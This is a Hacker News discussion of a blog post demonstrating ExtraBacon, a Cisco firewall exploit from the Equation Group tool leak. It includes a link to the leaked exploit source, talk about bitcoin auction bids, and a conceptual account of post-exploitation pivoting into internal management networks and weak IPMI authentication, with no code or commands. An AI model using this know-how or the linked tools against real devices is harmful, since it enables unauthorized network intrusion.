
EquationGroup Tool Leak – ExtraBacon Demo - ianhawes
https://xorcatt.wordpress.com/2016/08/16/equationgroup-tool-leak-extrabacon-demo/
======
djsumdog
Someone at Kiwicon (2015, I think?) went through breaking into a CISCO router.
Newer Cisco hardware actually runs a Linux kernel and one, massive (I think it
was like 50MB) binary. There's only one ethernet device too because the others
are controlled by user-space PCI devices within that binary.

For what I could tell, it looked like Cisco use to have a full independent OS
(ios) and when they switched to Intel hardware, it was easier for them to just
build a shim layer between Linux and their OS so they could run on
cheaper/newer hardware without a massive rewrite.

Anyway, that guy responsibly disclosed and his exploit was patched, but it did
give full access to everything, including the ability to create new routes and
filters that wouldn't even be visible from within ios.

------
nneonneo
Source code from the leak, if anyone's curious:
[https://github.com/nneonneo/eqgrp-free-
file/tree/master/Fire...](https://github.com/nneonneo/eqgrp-free-
file/tree/master/Firewall/EXPLOITS/EXBA)

------
mrb
Ha! Someone sent 1.5 BTC (~800 USD) to the hacker's address
19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK to bid on eqgrp_auction_file.tar.xz.asc. He
sent it from a vanity bitcoin address starting with "1nice" ;-)
[https://blockchain.info/tx/c44b40b6d845d9cc256e21606821569db...](https://blockchain.info/tx/c44b40b6d845d9cc256e21606821569dbe7232ffeab4cd7c65b037ca7e38abd1)

~~~
abrkn
It embeds a Bitmessage[1] address using the OP_RETURN[2] opcode as
EquationGroup requested:

    
    
        BM-2cXe6wAT7yTgoxGCpDMmdWq2xxWcdmL3Ek
    

[1]
[https://bitmessage.org/wiki/Main_Page](https://bitmessage.org/wiki/Main_Page)
[2]
[https://en.bitcoin.it/wiki/OP_RETURN](https://en.bitcoin.it/wiki/OP_RETURN)

~~~
ryan-c
This one[0] has cryptome's GPG fingerprint.

The same person seems to have sent several others, including one listing
cryptome's email address and several rude[1] and vulger[2] messages. Charming.

0\.
[https://blockchain.info/tx/8974f9ba743f073bfe18a2f1505ad9934...](https://blockchain.info/tx/8974f9ba743f073bfe18a2f1505ad993401a0f8ea02406c8633741be61b07a26)

1\.
[https://blockchain.info/tx/8e1e3cda1caf23e2f3071595efdbc794b...](https://blockchain.info/tx/8e1e3cda1caf23e2f3071595efdbc794b9775c8cbd750cdac14494f01d12eaf1)

2\.
[https://blockchain.info/tx/527202542acc7d87a763bafa5fc66a0a9...](https://blockchain.info/tx/527202542acc7d87a763bafa5fc66a0a96e4cf5c338d7701a552124c9a776fae)

------
searine
[https://en.wikipedia.org/wiki/Equation_Group](https://en.wikipedia.org/wiki/Equation_Group)

FYI

------
shishiwakamaru
without the enable password, you can't do much

~~~
Zombieball
Could you elaborate to those of us not familiar with Cisco routers?

My understanding is this exploit disables password authentication and allows
you to access the device. A seperate command allows you to re-enable it.

Would this re-enabling kill your current connection? Is the password later
needed to change settings on the router (like if you typed sudo and are forced
to re-authenticate)?

~~~
a2tech
On a Cisco router you login via SSH or Telnet, then you run a command to
become 'enabled'. enable is a command like sudo on Linux-it elevates your
permission level so you can make changes (although not all changes require you
to be enabled, most do).

If you used ExtraBacon to clear the login user/password you would get a basic
shell on connection. This would open at least 2 options to you as an
attacker-1) using a local exploit to become an enabled user and 2) you can now
send traffic to ALL the networks that the firewall/router knows about-for
example, a non-internet connected management network that might be filled with
never upgraded KVM/OOB control equipment.

~~~
Zombieball
Thanks! #2 definitely seems like a big issue. I can imagine many "internal"
services that are potentially insecure.

~~~
Vendan
My fav is IPMI. Many devices allow you to log in using cipher 0... basically,
if you know the username, you get access. The rest... well, IMPI has a hash
disclosure built into the protocol. If you can guess a username, you can get
(and try to crack) the password.

------
meeper16
"ExtraBaconDemo" Ok, this is going to be hilarious.

------
waterside81
So I downloaded the files and poked around the Python code. The code looked
positively amateurish, not in its functionality (I'm sure it works) but in the
coding style. I'm not sure what I expected, but the formatting, the types of
comments, it all looked like it was written by someone who just started out
with Python. Maybe it was written very hastily, I don't know, but I encourage
others to take a look. It's interesting to see the source for this kind of
stuff.

~~~
DavidWanjiru
I'm curious if this has to do with their generally broken English, as I read
on what I think was their blog post. Does English proficiency affect coding
"fluency", seeing as you are coding in English?

~~~
Udik
I don't think that the English of that message is real. Looks made up, maybe
too give a better aura of mystery and possibly to avoid the risk of being
recognised by some writing style analysis software.

